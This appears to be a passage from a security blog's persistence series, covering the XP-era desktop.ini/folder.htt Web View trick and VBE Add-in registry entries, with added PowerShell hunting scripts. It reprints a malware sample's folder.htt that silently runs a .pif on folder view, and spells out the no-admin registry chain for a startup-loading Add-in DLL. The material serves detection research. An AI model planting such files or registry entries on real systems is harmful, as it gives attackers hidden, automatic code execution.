Beyond good ol’ Run key, Part 49

I was reviewing the logs of my sandbox and came across a very old malware that was using an old-school trick as a way to increase its chances of survival – it used the desktop.ini / folder.htt combo that comes into play when the Web View is chosen for folders (XP or earlier). I know, I know… it’s archaeology… but I checked my old posts in this series and realized I have not covered it yet, so I am fixing it now…

An example Desktop.ini created by the malware looks like this:

[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

and the associated folder.htt like this:

<html>
<head>
<meta http-equiv="content-type"content="text/html; charset=Windows-1252">
</head>
<body style="margin: 0" scroll=no>
<object id=FileList border=0 tabindex=1
classid= "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"
style="width: 100; height: 100" tabIndex=-1>
</object>
</body>
</html>
<script>
objectstr="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
objectstr+="CODEBASE=\"Mr_CF.pif#version=1,1,1,1\">"
objectstr+="<PARAM NAME=\"_Version\" VALUE=\"65536\">"
objectstr+="</OBJECT>"
objectstr+="<HTML><H1></H1></HTML>";
document.writeln(objectstr);
document.close();
</script>

There is not much more I can write here… this is super old-school and I am just adding it for completeness.
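Since the pairing above is easy to hunt for, here is an added example (my own, not code from the original post or the sample) that sweeps a tree for desktop.ini files whose PersistMoniker hands folder rendering to a template, and reports any CODEBASE in that template that does not point at a .cab. The root path and the "anything but a .cab is suspicious" heuristic are assumptions of mine.

```powershell
# Added example, not code from the original post: hunt for the desktop.ini /
# folder.htt Web View pairing shown above. The root path and the "anything but
# a .cab in CODEBASE is suspicious" heuristic are my own assumptions.
param([string]$Root = 'C:\')

# CLSID of the Web View shell extension named in the sample desktop.ini above
$WebViewClsid = '{5984FFE0-28D4-11CF-AE66-08002B2E1262}'

function Get-WebViewTemplate {
    param([System.IO.FileInfo]$DesktopIni)

    $ini = Get-Content -LiteralPath $DesktopIni.FullName -Raw -ErrorAction SilentlyContinue
    if (-not $ini) { return }

    # Only folders that hand rendering to a custom template matter here
    $m = [regex]::Match($ini, '(?im)^\s*PersistMoniker\s*=\s*(?:file://)?(\S+)')
    if (-not $m.Success) { return }

    $template = Join-Path -Path $DesktopIni.DirectoryName -ChildPath $m.Groups[1].Value
    $body     = if (Test-Path -LiteralPath $template) {
                    Get-Content -LiteralPath $template -Raw -ErrorAction SilentlyContinue
                } else { '' }

    # CODEBASE normally points at a .cab; the sample above used it to run a .pif.
    # The pattern tolerates the backslash-escaped quotes of a JavaScript string.
    $codebases = [regex]::Matches($body, '(?i)CODEBASE\s*=\s*\\?"([^"#\\]+)') |
                 ForEach-Object { $_.Groups[1].Value }

    [pscustomobject]@{
        DesktopIni      = $DesktopIni.FullName
        FolderAttribs   = (Get-Item -LiteralPath $DesktopIni.DirectoryName -Force).Attributes
        UsesWebViewGuid = $ini -match [regex]::Escape($WebViewClsid)
        Template        = $template
        TemplateExists  = Test-Path -LiteralPath $template
        CodeBase        = ($codebases -join ';')
        Suspicious      = [bool]($codebases | Where-Object { $_ -notmatch '\.cab$' })
    }
}

Get-ChildItem -Path $Root -Filter 'desktop.ini' -Recurse -Force -File -ErrorAction SilentlyContinue |
    ForEach-Object { Get-WebViewTemplate -DesktopIni $_ } |
    Where-Object { $_ } |
    Sort-Object Suspicious -Descending |
    Format-Table -AutoSize
```

The folder attributes are reported because Explorer only honours a desktop.ini when the containing folder carries the read-only or system attribute, so a planted pair in a plain folder is inert; a hit with those attributes set, a template that exists and a non-.cab CODEBASE is the combination worth pulling for analysis.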

Beyond good ol’ Run key, Part 48

I have just updated my very old post about HKLM\SOFTWARE\Microsoft\VBA\Monitors. I discovered its additional ‘properties’ while looking at the VBE (Visual Basic Editor). On the way, I have also discovered that Visual Basic for Applications’ old-school IDE allows programmers to create Add-ins. A quick googling followed and I immediately found a number of Add-ins for VBE – I was actually quite surprised that there are so many!

Seriously, there is a huge interest in it! With all the C, Java and Python programmers out there… it would seem that VBA is strong and here to stay…

So, anyway… I didn’t spend much time on it as many programmers already provide good examples of VBE Add-ins, so I will just document where to find the possible persistence entries.

VBE discovers Add-ins by enumerating the subkeys of the following key (64-bit Office reads the sibling Addins64 key instead):

  • HKCU\Software\Microsoft\VBA\VBE\6.0\Addins\<AddInName>\…

Each Add-in has a dedicated subkey (its name is the Add-in’s ProgID) where it lists the properties:

  • Description – Full description, shown in the VBE Add-In Manager dialog
  • FriendlyName – Short name, shown in the same dialog
  • LoadBehavior – A DWORD bit mask: bit 0 (value 1) means the Add-in is currently loaded, bit 1 (value 2) means load it when VBE starts; 3 is the usual “load at startup and currently loaded” setting, 0 means not loaded. For persistence it is the startup bit that matters
  • SatelliteDllName + SatelliteDllPath – references to localized information about the plug-in

So, anyone wanting to load a VBE Add-in needs to set up the Addins subkey with the aforementioned values (LoadBehavior = 3), and then register the COM class the ProgID resolves to under HKCR:

  • HKCR\<AddInName>\Clsid = <GUID>
  • HKCR\CLSID\{<GUID>}\InprocServer32 = … (the default value is the path of the DLL; it must be an in-process COM server implementing IDTExtensibility2, whose OnConnection method VBE calls when the Add-in loads)

Note that HKCR is the merged view of HKLM\Software\Classes and HKCU\Software\Classes, so both HKCR entries can be written under HKCU\Software\Classes without administrative rights, which keeps the whole chain inside the user hive.
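To turn the above into a check, here is an added example of mine (not code from the original post) that lists the registered VBE Add-ins and follows the same ProgID → CLSID → InprocServer32 chain VBE does, ending at the DLL, its signature status, and whether the class lives in the per-user hive. Checking the HKLM mirror of the key and the Addins64 sibling is my assumption; the post itself only names the HKCU Addins path.

```powershell
# Added example, not code from the original post: list VBE Add-in registrations and
# follow the ProgID -> CLSID -> InprocServer32 chain to the DLL VBE would load.
# Assumption: the Addins64 subkey (64-bit Office) and the HKLM mirror of the key
# are checked as well; the post itself only names the HKCU\...\Addins path.

$AddinRoots = @(
    'HKCU:\Software\Microsoft\VBA\VBE\6.0\Addins',
    'HKCU:\Software\Microsoft\VBA\VBE\6.0\Addins64',
    'HKLM:\Software\Microsoft\VBA\VBE\6.0\Addins',
    'HKLM:\Software\Microsoft\VBA\VBE\6.0\Addins64'
)

function Get-DefaultValue {
    # Returns the (default) value of a registry key, or $null if the key is missing
    param([string]$Path)
    $item = Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue
    if ($item) { $item.'(default)' } else { $null }
}

function Get-VbeAddin {
    param([string]$Root)
    if (-not (Test-Path -Path $Root)) { return }

    Get-ChildItem -Path $Root | ForEach-Object {
        $progId = $_.PSChildName                     # subkey name doubles as the ProgID
        $props  = Get-ItemProperty -Path $_.PSPath
        $lb     = [int]$props.LoadBehavior           # missing value -> 0 (not loaded)

        # HKCR is the merged view of HKLM\Software\Classes and HKCU\Software\Classes,
        # so a per-user ProgID/CLSID needs no admin rights to plant.
        $clsid = Get-DefaultValue "Registry::HKEY_CLASSES_ROOT\$progId\Clsid"
        $dll   = if ($clsid) { Get-DefaultValue "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32" }
        $path  = if ($dll) { [Environment]::ExpandEnvironmentVariables($dll.Trim('"')) }
        $onDisk = [bool]($path -and (Test-Path -LiteralPath $path))

        [pscustomobject]@{
            Root          = $Root
            ProgId        = $progId
            FriendlyName  = $props.FriendlyName
            LoadBehavior  = $lb
            LoadAtStartup = [bool]($lb -band 2)      # bit 1 = load on startup (3 = startup + loaded)
            Clsid         = $clsid
            Dll           = $path
            DllExists     = $onDisk
            Signature     = if ($onDisk) { (Get-AuthenticodeSignature -FilePath $path).Status } else { 'n/a' }
            PerUserClass  = [bool]($clsid -and (Test-Path -Path "HKCU:\Software\Classes\CLSID\$clsid"))
        }
    }
}

$AddinRoots | ForEach-Object { Get-VbeAddin -Root $_ } | Format-List
```

An Add-in whose LoadAtStartup is true, whose class is registered per user and whose DLL is unsigned or sits outside Program Files is the profile a persistence hunt is after; a CLSID that resolves to no InprocServer32 at all is a broken registration rather than a finding, but worth noting because it is also what a half-removed implant leaves behind.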